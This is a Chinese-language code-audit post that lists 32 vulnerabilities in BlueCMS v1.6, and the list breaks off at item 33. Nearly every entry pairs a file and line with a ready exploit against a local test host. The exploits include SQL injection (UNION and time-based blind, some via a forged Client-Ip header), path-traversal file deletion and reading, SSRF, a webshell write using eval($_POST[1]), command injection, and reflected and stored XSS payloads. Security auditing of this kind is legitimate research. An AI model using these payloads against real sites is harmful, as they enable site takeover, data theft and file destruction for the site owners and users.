阅读量:0
代码审计:Bluecms v1.6
漏洞列表如下(附Exp):
未完待续…
1、include/common.fun.php->getip()存在ip伪造漏洞 2、ad_js.php sql注入漏洞 Exp:view-source:http://127.0.0.3/bluecms/ad_js.php?ad_id=12%20+UNION%20+SELECT+1,2,3,4,5,6,database() 3、user.php 766行任意文件删除漏洞 Exp:http://127.0.0.3/bluecms/user.php?act=edit_user_info Post:face_pic3=2.php 4、user.php 955行任意文件删除漏洞 Exp:http://127.0.0.3/bluecms/user.php?act=del_pic Post:id=2.php 5、user.php 476行任意文件删除漏洞 Exp:http://127.0.0.3/bluecms/user.php?act=do_info_edit Post提交post_id=1&title=1&content=1&cat_id=1&area=1&useful_time=1&is_recommend1=1&top_type=1&is_head_line=1&link_man=1&link_phone=1&att1=1&att2=1&top_type1=1&is_head_line1=1&lit_pic=1.php 6、admin/article.php 132行存在后台sql注入漏洞 Exp:http://127.0.0.3/bluecms/admin/article.php?act=del&id=1 and if(length(select database())=7,1,sleep(10)) 时间盲注 7、admin/article.php 85行处存在任意文件删除漏洞 Exp:article.html 8、admin/attachment.php 78行存在后台sql注入漏洞 Exp:http://127.0.0.3/bluecms/admin/attachment.php?act=del&att_id=1 and if(length(select database())=7,1,sleep(10)) 时间盲注 9、admin/database.php 208行处存在任意文件删除漏洞 Exp:http://127.0.0.3/bluecms/admin/article.php?act=del&file_name=../1.php 10、admin/flash.php 47行处存在任意文件删除漏洞 Exp:http://127.0.0.3/bluecms/admin/flash.php?act=do_edit Post:image_id=1&image_path2=../1.php 11、admin/flash.php 47行处存在SSRF漏洞 Exp:http://127.0.0.3/bluecms/admin/flash.php?act=do_edit Post:image_id=1&image_path=http://网站 触发:点击flash链接(逻辑漏洞,strpos($_POST['image_path'], 'http://') != false,strpos返回的是位置,如果'http://'在首位,返回0.而0不等于false,从而绕过判断) 12、admin/link.php 50行处存在SSRF漏洞 Exp:http://127.0.0.3/bluecms/admin/link.php?act=do_edit Post:link_logo=http://网站 触发:点击网站上导航链接 13、admin/link.php 50行处存在任意文件删除漏洞 Exp:http://127.0.0.3/bluecms/admin/link.php?act=do_edit Post:link_logo2=../1.php 14、admin/info.php 281行处存在任意文件删除漏洞 Exp:http://127.0.0.3/bluecms/admin/info.php?act=do_edit Post:post_id=1&title=1&content=1&cat_id=1&area=1&useful_time=1&is_recommend1=1&top_type=1&is_head_line=1&link_man=1&link_phone=1&att1=1&att2=1&top_type1=1&is_head_line1=1&lit_pic=1.php 15、admin/info.php 526行处存在任意文件删除漏洞 Exp:http://127.0.0.3/bluecms/admin/info.php?act=del_pic Post:id=../1.php 16、admin/link.php 79行处存在任意文件删除漏洞 Exp:http://127.0.0.3/bluecms/admin/link.php?act=del&linkid=1 Post:link_logo=../1.php 17、admin/nav.php 63行存在后台sql注入漏洞 Exp:http://127.0.0.3/bluecms/admin/nav.php?act=edit&navid=1 union select 1,2,3,4,user(),6 limit 1,1 18、admin/tpl_manage.php 47行处存在任意文件写入漏洞,可写入webshell Exp:http://127.0.0.3/bluecms/admin/tpl_manage.php?act=do_edit Post:tpl_name=../../index.php&tpl_content=<?php eval($_POST[1]);?> 19、admin/tpl_manage.php 35行处存在任意文件读取漏洞 Exp:http://127.0.0.3/bluecms/admin/tpl_manage.php?act=edit&tpl_name=../../1.txt 20、include/filter.inc.php 11行处存在变量覆盖漏洞(影响user.php) Exp:http://127.0.0.3/bluecms/user.php?{变量名}={变量值} 21、uc_client/lib/uccode.class.php 38行处存在命令执行漏洞 Exp:$message = "[email=attacker@example.com]Hello; system('ls'); [/email]"; 22、comment.php 113行处存在sql注入漏洞 Exp:http://127.0.0.3/bluecms/comment.php?act=send&id=1 Post:mood=1&comment=hhh&type=1 Client-Ip:1','1'),('','1','1','1','1',database(),'1','1 23、user.php 112行处存在任意文件读取漏洞 Exp:http://127.0.0.3/bluecms/user.php?act=do_login Post:referer=&user_name=hhhhh&pwd=KpKvtmXyZLkD6uY&pwd1=KpKvtmXyZLkD6uY&email=1%40qq.com&safecode=s43f&from={base64(文件地址)}&act=do_login 24、user.php 206行处存在任意文件读取漏洞 Exp:http://127.0.0.3/bluecms/user.php?act=do_reg Post:referer=&user_name=hhhhh&pwd=KpKvtmXyZLkD6uY&pwd1=KpKvtmXyZLkD6uY&email=1%40qq.com&safecode=s43f&from={base64(文件地址)}&act=do_reg 25、user.php 130行处存在反射型XSS漏洞 Exp:http://127.0.0.3/bluecms/user.php?act=reg&from="/><script>alert(1);</script>" 26、user.php 58行处存在反射型XSS漏洞 Exp:http://127.0.0.3/bluecms/user.php?act=login&from="/><script>alert(1);</script>" 27、user.php 772行存在储存型XSS漏洞 Exp:http://127.0.0.3/bluecms/user.php?act=edit_user_info Post:user_name=hhhhh&pwd=KpKvtmXyZLkD6uY&pwd1=KpKvtmXyZLkD6uY&email=from=<script>alert(1);</script>&safecode=s43f&from=}&act=do_reg 28、user.php 134行存在储存型XSS漏洞 Exp:http://127.0.0.3/bluecms/user.php?act=do_reg Post:user_name=hhhhh&pwd=KpKvtmXyZLkD6uY&pwd1=KpKvtmXyZLkD6uY&email=from=<script>alert(1);</script>&safecode=s43f&from=}&act=do_reg 29、guest_book.php 67行处存在sql注入漏洞 Exp:http://127.0.0.3/bluecms/comment.php?act=send Post:content=hhh Client-Ip:1',user())# 30、guest_book.php 67行处存在储存型XSS漏洞 Exp:http://127.0.0.3/bluecms/comment.php?act=send Post:content=hhh Client-Ip:1','<script>alert(1);</script>')# 31、admin/arc_cat.php 27行处存在储存型XSS漏洞 Exp:http://127.0.0.3/bluecms/user.php?act=do_add Post:cat_name='<script>alert(1);</script>'&show_order=0&parent_id=1&title=1&keywords=1description=3 32、admin/arc_cat.php 53行处存在储存型XSS漏洞 Exp:http://127.0.0.3/bluecms/user.php?act=edit Post:cat_name='<script>alert(1);</script>'&show_order=0&parent_id=1&title=1&keywords=1description=3 33、 